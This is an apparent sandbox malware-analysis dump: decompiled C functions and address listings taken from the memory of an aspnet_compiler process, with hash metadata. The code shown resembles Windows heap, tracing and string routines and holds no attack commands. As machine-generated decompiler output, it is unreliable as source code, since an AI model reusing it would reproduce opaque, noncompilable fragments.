                          0x00000000
                          0x0148b96a
                          0x0148b99b
                          0x0148b99e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0148b99e
                          0x0148b951
                          0x0148b954
                          0x0148b95a
                          0x0148b95e
                          0x0148b972
                          0x0148b979
                          0x0148b97d
                          0x0148b97f
                          0x0148b980
                          0x0148b982
                          0x0148b984
                          0x00000000
                          0x0148b984
                          0x00000000
                          0x0148b926
                          0x00000000
                          0x0148b926

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12a38f7acc35a91667cd41301d47eb52ea65f0437ee0d2629ee88725099e85e9
                          • Instruction ID: aeb0d78ec9d380190e167b7e4bfef1e2e5f40db5fc2174a91104f03bb606977f
                          • Opcode Fuzzy Hash: 12a38f7acc35a91667cd41301d47eb52ea65f0437ee0d2629ee88725099e85e9
                          • Instruction Fuzzy Hash: E4710F32200B02AFE732EF19C840F6ABBE5EB54724F14452EE6558B7B1DBB1E941CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E01476DC9(signed int __ecx, void* __edx) {
                          				unsigned int _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				char _v36;
                          				char _v40;
                          				char _v44;
                          				char _v48;
                          				char _v52;
                          				char _v56;
                          				char _v60;
                          				void* _t87;
                          				void* _t95;
                          				signed char* _t96;
                          				signed int _t107;
                          				signed int _t136;
                          				signed char* _t137;
                          				void* _t157;
                          				void* _t161;
                          				void* _t167;
                          				intOrPtr _t168;
                          				void* _t174;
                          				void* _t175;
                          				signed int _t176;
                          				void* _t177;
                          
                          				_t136 = __ecx;
                          				_v44 = 0;
                          				_t167 = __edx;
                          				_v40 = 0;
                          				_v36 = 0;
                          				_v32 = 0;
                          				_v60 = 0;
                          				_v56 = 0;
                          				_v52 = 0;
                          				_v48 = 0;
                          				_v16 = __ecx;
                          				_t87 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                          				_t175 = _t87;
                          				if(_t175 != 0) {
                          					_t11 = _t175 + 0x30; // 0x30
                          					 *((short*)(_t175 + 6)) = 0x14d4;
                          					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                          					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                          					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                          					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                          					E01476B4C(_t167, _t11, 0x214,  &_v8);
                          					_v12 = _v8 + 0x10;
                          					_t95 = E01417D50();
                          					_t137 = 0x7ffe0384;
                          					if(_t95 == 0) {
                          						_t96 = 0x7ffe0384;
                          					} else {
                          						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          					}
                          					_push(_t175);
                          					_push(_v12);
                          					_push(0x402);
                          					_push( *_t96 & 0x000000ff);
                          					E01439AE0();
                          					_t87 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                          					_t176 = _v16;
                          					if((_t176 & 0x00000100) != 0) {
                          						_push( &_v36);
                          						_t157 = 4;
                          						_t87 = E0147795D( *((intOrPtr*)(_t167 + 8)), _t157);
                          						if(_t87 >= 0) {
                          							_v24 = E0147795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                          							_v28 = E0147795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                          							_push( &_v52);
                          							_t161 = 5;
                          							_t168 = E0147795D( *((intOrPtr*)(_t167 + 8)), _t161);
                          							_v20 = _t168;
                          							_t107 = L01414620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                          							_v16 = _t107;
                          							if(_t107 != 0) {
                          								_v8 = _v8 & 0x00000000;
                          								 *(_t107 + 0x20) = _t176;
                          								 *((short*)(_t107 + 6)) = 0x14d5;
                          								_t47 = _t107 + 0x24; // 0x24
                          								_t177 = _t47;
                          								E01476B4C( &_v36, _t177, 0xc78,  &_v8);
                          								_t51 = _v8 + 4; // 0x4
                          								_t178 = _t177 + (_v8 >> 1) * 2;
                          								_v12 = _t51;
                          								E01476B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                          								_v12 = _v12 + _v8;
                          								E01476B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                          								_t125 = _v8;
                          								_v12 = _v12 + _v8;
                          								E01476B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                          								_t174 = _v12 + _v8;
                          								if(E01417D50() != 0) {
                          									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          								}
                          								_push(_v16);
                          								_push(_t174);
                          								_push(0x402);
                          								_push( *_t137 & 0x000000ff);
                          								E01439AE0();
                          								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                          								_t168 = _v20;
                          							}
                          							_t87 = L01412400( &_v36);
                          							if(_v24 >= 0) {
                          								_t87 = L01412400( &_v44);
                          							}
                          							if(_t168 >= 0) {
                          								_t87 = L01412400( &_v52);
                          							}
                          							if(_v28 >= 0) {
                          								return L01412400( &_v60);
                          							}
                          						}
                          					}
                          				}
                          				return _t87;
                          			}































                          0x01476dd4
                          0x01476dde
                          0x01476de1
                          0x01476de3
                          0x01476de6
                          0x01476de9
                          0x01476dec
                          0x01476def
                          0x01476df2
                          0x01476df5
                          0x01476dfe
                          0x01476e04
                          0x01476e09
                          0x01476e0d
                          0x01476e18
                          0x01476e1b
                          0x01476e22
                          0x01476e2d
                          0x01476e30
                          0x01476e36
                          0x01476e42
                          0x01476e4d
                          0x01476e50
                          0x01476e55
                          0x01476e5c
                          0x01476e6e
                          0x01476e5e
                          0x01476e67
                          0x01476e67
                          0x01476e73
                          0x01476e74
                          0x01476e77
                          0x01476e7c
                          0x01476e7d
                          0x01476e8e
                          0x01476e93
                          0x01476e9c
                          0x01476ea8
                          0x01476eab
                          0x01476eac
                          0x01476eb3
                          0x01476ecd
                          0x01476edc
                          0x01476ee2
                          0x01476ee5
                          0x01476ef2
                          0x01476efb
                          0x01476f01
                          0x01476f06
                          0x01476f0b
                          0x01476f11
                          0x01476f1a
                          0x01476f22
                          0x01476f26
                          0x01476f26
                          0x01476f33
                          0x01476f41
                          0x01476f44
                          0x01476f47
                          0x01476f54
                          0x01476f65
                          0x01476f77
                          0x01476f7c
                          0x01476f82
                          0x01476f91
                          0x01476f99
                          0x01476fa3
                          0x01476fae
                          0x01476fae
                          0x01476fba
                          0x01476fbb
                          0x01476fbc
                          0x01476fc1
                          0x01476fc2
                          0x01476fd3
                          0x01476fd8
                          0x01476fd8
                          0x01476fdf
                          0x01476fe8
                          0x01476fee
                          0x01476fee
                          0x01476ff5
                          0x01476ffb
                          0x01476ffb
                          0x01477004
                          0x00000000
                          0x0147700a
                          0x01477004
                          0x01476eb3
                          0x01476e9c
                          0x01477015

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                          • Instruction ID: 041aee68866d5acc94392d3db7302b2f9d0be5ad43b9fb6cd6b7c46289bf679c
                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                          • Instruction Fuzzy Hash: 8E718071E0061AEFDB11DFA9C984EEEBBB9FF58714F10446AE504E7260D734AA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E013F52A5(char __ecx) {
                          				char _v20;
                          				char _v28;
                          				char _v29;
                          				void* _v32;
                          				void* _v36;
                          				void* _v37;
                          				void* _v38;
                          				void* _v40;
                          				void* _v46;
                          				void* _v64;
                          				void* __ebx;
                          				intOrPtr* _t49;
                          				signed int _t53;
                          				short _t85;
                          				signed int _t87;
                          				signed int _t88;
                          				signed int _t89;
                          				intOrPtr _t101;
                          				intOrPtr* _t102;
                          				intOrPtr* _t104;
                          				signed int _t106;
                          				void* _t108;
                          
                          				_t93 = __ecx;
                          				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                          				_push(_t88);
                          				_v29 = __ecx;
                          				_t89 = _t88 | 0xffffffff;
                          				while(1) {
                          					E0140EEF0(0x14e79a0);
                          					_t104 =  *0x14e8210; // 0xfa2c40
                          					if(_t104 == 0) {
                          						break;
                          					}
                          					asm("lock inc dword [esi]");
                          					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                          					E0140EB70(_t93, 0x14e79a0);
                          					if( *((char*)(_t108 + 0xf)) != 0) {
                          						_t101 =  *0x7ffe02dc;
                          						__eflags =  *(_t104 + 0x14) & 0x00000001;
                          						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                          							L9:
                          							_push(0);
                          							_push(0);
                          							_push(0);
                          							_push(0);
                          							_push(0x90028);
                          							_push(_t108 + 0x20);
                          							_push(0);
                          							_push(0);
                          							_push(0);
                          							_push( *((intOrPtr*)(_t104 + 4)));
                          							_t53 = E01439890();
                          							__eflags = _t53;
                          							if(_t53 >= 0) {
                          								__eflags =  *(_t104 + 0x14) & 0x00000001;
                          								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                          									E0140EEF0(0x14e79a0);
                          									 *((intOrPtr*)(_t104 + 8)) = _t101;
                          									E0140EB70(0, 0x14e79a0);
                          								}
                          								goto L3;
                          							}
                          							__eflags = _t53 - 0xc0000012;
                          							if(__eflags == 0) {
                          								L12:
                          								_t13 = _t104 + 0xc; // 0xfa2c4d
                          								_t93 = _t13;
                          								 *((char*)(_t108 + 0x12)) = 0;
                          								__eflags = E0142F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                          								if(__eflags >= 0) {
                          									L15:
                          									_t102 = _v28;
                          									 *_t102 = 2;
                          									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                          									E0140EEF0(0x14e79a0);
                          									__eflags =  *0x14e8210 - _t104; // 0xfa2c40
                          									if(__eflags == 0) {
                          										__eflags =  *((char*)(_t108 + 0xe));
                          										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                          										 *0x14e8210 = _t102;
                          										_t32 = _t102 + 0xc; // 0x0
                          										 *_t95 =  *_t32;
                          										_t33 = _t102 + 0x10; // 0x0
                          										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                          										_t35 = _t102 + 4; // 0xffffffff
                          										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                          										if(__eflags != 0) {
                          											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                          											E01474888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                          										}
                          										E0140EB70(_t95, 0x14e79a0);
                          										asm("lock xadd [esi], eax");
                          										if(__eflags == 0) {
                          											_push( *((intOrPtr*)(_t104 + 4)));
                          											E014395D0();
                          											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                          										}
                          										asm("lock xadd [esi], ebx");
                          										__eflags = _t89 == 1;
                          										if(_t89 == 1) {
                          											_push( *((intOrPtr*)(_t104 + 4)));
                          											E014395D0();
                          											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                          										}
                          										_t49 = _t102;
                          										L4:
                          										return _t49;
                          									}
                          									E0140EB70(_t93, 0x14e79a0);
                          									asm("lock xadd [esi], eax");
                          									if(__eflags == 0) {
                          										_push( *((intOrPtr*)(_t104 + 4)));
                          										E014395D0();
                          										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                          										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                          									}
                          									 *_t102 = 1;
                          									asm("lock xadd [edi], eax");
                          									if(__eflags == 0) {
                          										_t28 = _t102 + 4; // 0xffffffff
                          										_push( *_t28);
                          										E014395D0();
                          										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                          									}
                          									continue;
                          								}
                          								_t93 =  &_v20;
                          								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                          								_t85 = 6;
                          								_v20 = _t85;
                          								_t87 = E0142F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                          								__eflags = _t87;
                          								if(_t87 < 0) {
                          									goto L3;
                          								}
                          								 *((char*)(_t108 + 0xe)) = 1;
                          								goto L15;
                          							}
                          							__eflags = _t53 - 0xc000026e;
                          							if(__eflags != 0) {
                          								goto L3;
                          							}
                          							goto L12;
                          						}
                          						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                          						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                          							goto L3;
                          						} else {
                          							goto L9;
                          						}
                          					}
                          					L3:
                          					_t49 = _t104;
                          					goto L4;
                          				}
                          				_t49 = 0;
                          				goto L4;
                          			}

























                          0x013f52a5
                          0x013f52ad
                          0x013f52b0
                          0x013f52b3
                          0x013f52b7
                          0x013f52ba
                          0x013f52bf
                          0x013f52c4
                          0x013f52cc
                          0x00000000
                          0x00000000
                          0x013f52ce
                          0x013f52d9
                          0x013f52dd
                          0x013f52e7
                          0x013f52f7
                          0x013f52f9
                          0x013f52fd
                          0x01450dcf
                          0x01450dd5
                          0x01450dd6
                          0x01450dd7
                          0x01450dd8
                          0x01450dd9
                          0x01450dde
                          0x01450ddf
                          0x01450de0
                          0x01450de1
                          0x01450de2
                          0x01450de5
                          0x01450dea
                          0x01450dec
                          0x01450f60
                          0x01450f64
                          0x01450f70
                          0x01450f76
                          0x01450f79
                          0x01450f79
                          0x00000000
                          0x01450f64
                          0x01450df2
                          0x01450df7
                          0x01450e04
                          0x01450e0d
                          0x01450e0d
                          0x01450e10
                          0x01450e1a
                          0x01450e1c
                          0x01450e4c
                          0x01450e52
                          0x01450e61
                          0x01450e67
                          0x01450e6b
                          0x01450e70
                          0x01450e76
                          0x01450ed7
                          0x01450edc
                          0x01450ee0
                          0x01450ee6
                          0x01450eea
                          0x01450eed
                          0x01450ef0
                          0x01450ef3
                          0x01450ef6
                          0x01450ef9
                          0x01450efe
                          0x01450f01
                          0x01450f01
                          0x01450f0b
                          0x01450f12
                          0x01450f16
                          0x01450f18
                          0x01450f1b
                          0x01450f2c
                          0x01450f31
                          0x01450f31
                          0x01450f35
                          0x01450f39
                          0x01450f3a
                          0x01450f3c
                          0x01450f3f
                          0x01450f50
                          0x01450f55
                          0x01450f55
                          0x01450f59
                          0x013f52eb
                          0x013f52f1
                          0x013f52f1
                          0x01450e7d
                          0x01450e84
                          0x01450e88
                          0x01450e8a
                          0x01450e8d
                          0x01450e9e
                          0x01450ea3
                          0x01450ea3
                          0x01450ea7
                          0x01450eaf
                          0x01450eb3
                          0x01450eb9
                          0x01450eb9
                          0x01450ebc
                          0x01450ecd
                          0x01450ecd
                          0x00000000
                          0x01450eb3
                          0x01450e21
                          0x01450e2b
                          0x01450e2f
                          0x01450e30
                          0x01450e3a
                          0x01450e3f
                          0x01450e41
                          0x00000000
                          0x00000000
                          0x01450e47
                          0x00000000
                          0x01450e47
                          0x01450df9
                          0x01450dfe
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01450dfe
                          0x013f5303
                          0x013f5307
                          0x00000000
                          0x013f5309
                          0x00000000
                          0x013f5309
                          0x013f5307
                          0x013f52e9
                          0x013f52e9
                          0x00000000
                          0x013f52e9
                          0x013f530e
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 228bc4f033d46c8aeb77c65b9cc06322fe8fa15005fd7534f9d48ff9b4ef71c4
                          • Instruction ID: 9b37e5ea3b7b504fc8f8aa2e12fa20865fd693afd1c1ba88650cb54a40157be5
                          • Opcode Fuzzy Hash: 228bc4f033d46c8aeb77c65b9cc06322fe8fa15005fd7534f9d48ff9b4ef71c4
                          • Instruction Fuzzy Hash: D8510075104742ABD322EF6AC840B27BBE4FFA4724F14091FF995876A2E774E844C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01422AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                          				signed short* _v8;
                          				signed short* _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr* _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				short _t56;
                          				signed int _t57;
                          				intOrPtr _t58;
                          				signed short* _t61;
                          				intOrPtr _t72;
                          				intOrPtr _t75;
                          				intOrPtr _t84;
                          				intOrPtr _t87;
                          				intOrPtr* _t90;
                          				signed short* _t91;
                          				signed int _t95;
                          				signed short* _t96;
                          				intOrPtr _t97;
                          				intOrPtr _t102;
                          				signed int _t108;
                          				intOrPtr _t110;
                          				signed int _t111;
                          				signed short* _t112;
                          				void* _t113;
                          				signed int _t116;
                          				signed short** _t119;
                          				short* _t120;
                          				signed int _t123;
                          				signed int _t124;
                          				void* _t125;
                          				intOrPtr _t127;
                          				signed int _t128;
                          
                          				_t90 = __ecx;
                          				_v16 = __edx;
                          				_t108 = _a4;
                          				_v28 = __ecx;
                          				_t4 = _t108 - 1; // -1
                          				if(_t4 > 0x13) {
                          					L15:
                          					_t56 = 0xc0000100;
                          					L16:
                          					return _t56;
                          				}
                          				_t57 = _t108 * 0x1c;
                          				_v32 = _t57;
                          				_t6 = _t57 + 0x14e8204; // 0x0
                          				_t123 =  *_t6;
                          				_t7 = _t57 + 0x14e8208; // 0x14e8207
                          				_t8 = _t57 + 0x14e8208; // 0x14e8207
                          				_t119 = _t8;
                          				_v36 = _t123;
                          				_t110 = _t7 + _t123 * 8;
                          				_v24 = _t110;
                          				_t111 = _a4;
                          				if(_t119 >= _t110) {
                          					L12:
                          					if(_t123 != 3) {
                          						_t58 =  *0x14e8450; // 0x0
                          						if(_t58 == 0) {
                          							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                          						}
                          					} else {
                          						_t26 = _t57 + 0x14e821c; // 0x0
                          						_t58 =  *_t26;
                          					}
                          					 *_t90 = _t58;
                          					goto L15;
                          				} else {
                          					goto L2;
                          				}
                          				while(1) {
                          					_t116 =  *_t61 & 0x0000ffff;
                          					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                          					if(_t116 == _t128) {
                          						goto L18;
                          					}
                          					L5:
                          					if(_t116 >= 0x61) {
                          						if(_t116 > 0x7a) {
                          							_t97 =  *0x14e6d5c; // 0x7fe60654
                          							_t72 =  *0x14e6d5c; // 0x7fe60654
                          							_t75 =  *0x14e6d5c; // 0x7fe60654
                          							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                          						} else {
                          							_t116 = _t116 - 0x20;
                          						}
                          					}
                          					if(_t128 >= 0x61) {
                          						if(_t128 > 0x7a) {
                          							_t102 =  *0x14e6d5c; // 0x7fe60654
                          							_t84 =  *0x14e6d5c; // 0x7fe60654
                          							_t87 =  *0x14e6d5c; // 0x7fe60654
                          							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                          						} else {
                          							_t128 = _t128 - 0x20;
                          						}
                          					}
                          					if(_t116 == _t128) {
                          						_t61 = _v12;
                          						_t96 = _v8;
                          					} else {
                          						_t113 = _t116 - _t128;
                          						L9:
                          						_t111 = _a4;
                          						if(_t113 == 0) {
                          							_t115 =  &(( *_t119)[_t111 + 1]);
                          							_t33 =  &(_t119[1]); // 0x100
                          							_t120 = _a8;
                          							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                          							_t35 = _t95 - 1; // 0xff
                          							_t124 = _t35;
                          							if(_t120 == 0) {
                          								L27:
                          								 *_a16 = _t95;
                          								_t56 = 0xc0000023;
                          								goto L16;
                          							}
                          							if(_t124 >= _a12) {
                          								if(_a12 >= 1) {
                          									 *_t120 = 0;
                          								}
                          								goto L27;
                          							}
                          							 *_a16 = _t124;
                          							_t125 = _t124 + _t124;
                          							E0143F3E0(_t120, _t115, _t125);
                          							_t56 = 0;
                          							 *((short*)(_t125 + _t120)) = 0;
                          							goto L16;
                          						}
                          						_t119 =  &(_t119[2]);
                          						if(_t119 < _v24) {
                          							L2:
                          							_t91 =  *_t119;
                          							_t61 = _t91;
                          							_v12 = _t61;
                          							_t112 =  &(_t61[_t111]);
                          							_v8 = _t112;
                          							if(_t61 >= _t112) {
                          								break;
                          							} else {
                          								_t127 = _v16 - _t91;
                          								_t96 = _t112;
                          								_v20 = _t127;
                          								_t116 =  *_t61 & 0x0000ffff;
                          								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                          								if(_t116 == _t128) {
                          									goto L18;
                          								}
                          								goto L5;
                          							}
                          						} else {
                          							_t90 = _v28;
                          							_t57 = _v32;
                          							_t123 = _v36;
                          							goto L12;
                          						}
                          					}
                          					L18:
                          					_t61 =  &(_t61[1]);
                          					_v12 = _t61;
                          					if(_t61 >= _t96) {
                          						break;
                          					}
                          					_t127 = _v20;
                          				}
                          				_t113 = 0;
                          				goto L9;
                          			}






































                          0x01422ae4
                          0x01422aec
                          0x01422aef
                          0x01422af4
                          0x01422af7
                          0x01422afd
                          0x01422b92
                          0x01422b92
                          0x01422b97
                          0x01422b9c
                          0x01422b9c
                          0x01422b03
                          0x01422b06
                          0x01422b09
                          0x01422b09
                          0x01422b0f
                          0x01422b15
                          0x01422b15
                          0x01422b1b
                          0x01422b1e
                          0x01422b21
                          0x01422b26
                          0x01422b29
                          0x01422b81
                          0x01422b84
                          0x01422c0e
                          0x01422c15
                          0x01422c24
                          0x01422c24
                          0x01422b8a
                          0x01422b8a
                          0x01422b8a
                          0x01422b8a
                          0x01422b90
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01422b4a
                          0x01422b4a
                          0x01422b4d
                          0x01422b53
                          0x00000000
                          0x00000000
                          0x01422b55
                          0x01422b58
                          0x01422bb7
                          0x01465d1b
                          0x01465d37
                          0x01465d47
                          0x01465d53
                          0x01422bbd
                          0x01422bbd
                          0x01422bbd
                          0x01422bb7
                          0x01422b5d
                          0x01422c2f
                          0x01465d5b
                          0x01465d77
                          0x01465d87
                          0x01465d93
                          0x01422c35
                          0x01422c35
                          0x01422c35
                          0x01422c2f
                          0x01422b65
                          0x01422b9f
                          0x01422ba2
                          0x01422b67
                          0x01422b67
                          0x01422b69
                          0x01422b6b
                          0x01422b6e
                          0x01422bc9
                          0x01422bcc
                          0x01422bcf
                          0x01422bd4
                          0x01422bd6
                          0x01422bd6
                          0x01422bdb
                          0x01422c02
                          0x01422c05
                          0x01422c07
                          0x00000000
                          0x01422c07
                          0x01422be0
                          0x01422c00
                          0x01422c3f
                          0x01422c3f
                          0x00000000
                          0x01422c00
                          0x01422be5
                          0x01422be7
                          0x01422bec
                          0x01422bf4
                          0x01422bf6
                          0x00000000
                          0x01422bf6
                          0x01422b70
                          0x01422b76
                          0x01422b2b
                          0x01422b2b
                          0x01422b2d
                          0x01422b2f
                          0x01422b32
                          0x01422b35
                          0x01422b3a
                          0x00000000
                          0x01422b40
                          0x01422b43
                          0x01422b45
                          0x01422b47
                          0x01422b4a
                          0x01422b4d
                          0x01422b53
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01422b53
                          0x01422b78
                          0x01422b78
                          0x01422b7b
                          0x01422b7e
                          0x00000000
                          0x01422b7e
                          0x01422b76
                          0x01422ba5
                          0x01422ba5
                          0x01422ba8
                          0x01422bad
                          0x00000000
                          0x00000000
                          0x01422baf
                          0x01422baf
                          0x01422bc2
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f9dab66214181841709d7415804898aa3e6ecebea1b9cb87829621c865a2970
                          • Instruction ID: a66a2939f5569168bbdb14e7afd6568099017c602ba2132157c3ba5c93f5b7bc
                          • Opcode Fuzzy Hash: 0f9dab66214181841709d7415804898aa3e6ecebea1b9cb87829621c865a2970
                          • Instruction Fuzzy Hash: 5751BF76E001258F8B14CF1CC480DBDBBF1BB88700B46845BE8569B375D670AA92CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E014BAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                          				signed int _v8;
                          				signed int _v12;
                          				void* __esi;
                          				void* __ebp;
                          				signed short* _t36;
                          				signed int _t41;
                          				char* _t42;
                          				intOrPtr _t43;
                          				signed int _t47;
                          				void* _t52;
                          				signed int _t57;
                          				intOrPtr _t61;
                          				signed char _t62;
                          				signed int _t72;
                          				signed char _t85;
                          				signed int _t88;
                          
                          				_t73 = __edx;
                          				_push(__ecx);
                          				_t85 = __ecx;
                          				_v8 = __edx;
                          				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                          				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                          				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                          					_t57 = _t57 | 0x00000001;
                          				}
                          				_t88 = 0;
                          				_t36 = 0;
                          				_t96 = _a12;
                          				if(_a12 == 0) {
                          					_t62 = _a8;
                          					__eflags = _t62;
                          					if(__eflags == 0) {
                          						goto L12;
                          					}
                          					_t52 = E014BC38B(_t85, _t73, _t57, 0);
                          					_t62 = _a8;
                          					 *_t62 = _t52;
                          					_t36 = 0;
                          					goto L11;
                          				} else {
                          					_t36 = E014BACFD(_t85, _t73, _t96, _t57, _a8);
                          					if(0 == 0 || 0 == 0xffffffff) {
                          						_t72 = _t88;
                          					} else {
                          						_t72 =  *0x00000000 & 0x0000ffff;
                          					}
                          					 *_a12 = _t72;
                          					_t62 = _a8;
                          					L11:
                          					_t73 = _v8;
                          					L12:
                          					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                          						L19:
                          						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                          							L22:
                          							_t74 = _v8;
                          							__eflags = _v8;
                          							if(__eflags != 0) {
                          								L25:
                          								__eflags = _t88 - 2;
                          								if(_t88 != 2) {
                          									__eflags = _t85 + 0x44 + (_t88 << 6);
                          									_t88 = E014BFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                          									goto L34;
                          								}
                          								L26:
                          								_t59 = _v8;
                          								E014BEA55(_t85, _v8, _t57);
                          								asm("sbb esi, esi");
                          								_t88 =  ~_t88;
                          								_t41 = E01417D50();
                          								__eflags = _t41;
                          								if(_t41 == 0) {
                          									_t42 = 0x7ffe0380;
                          								} else {
                          									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          								}
                          								__eflags =  *_t42;
                          								if( *_t42 != 0) {
                          									_t43 =  *[fs:0x30];
                          									__eflags =  *(_t43 + 0x240) & 0x00000001;
                          									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                          										__eflags = _t88;
                          										if(_t88 != 0) {
                          											E014B1608(_t85, _t59, 3);
                          										}
                          									}
                          								}
                          								goto L34;
                          							}
                          							_push(_t62);
                          							_t47 = E014C1536(0x14e8ae4, (_t74 -  *0x14e8b04 >> 0x14) + (_t74 -  *0x14e8b04 >> 0x14), _t88, __eflags);
                          							__eflags = _t47;
                          							if(_t47 == 0) {
                          								goto L26;
                          							}
                          							_t74 = _v12;
                          							_t27 = _t47 - 1; // -1
                          							_t88 = _t27;
                          							goto L25;
                          						}
                          						_t62 = _t85;
                          						if(L014BC323(_t62, _v8, _t57) != 0xffffffff) {
                          							goto L22;
                          						}
                          						_push(_t62);
                          						_push(_t88);
                          						E014BA80D(_t85, 9, _v8, _t88);
                          						goto L34;
                          					} else {
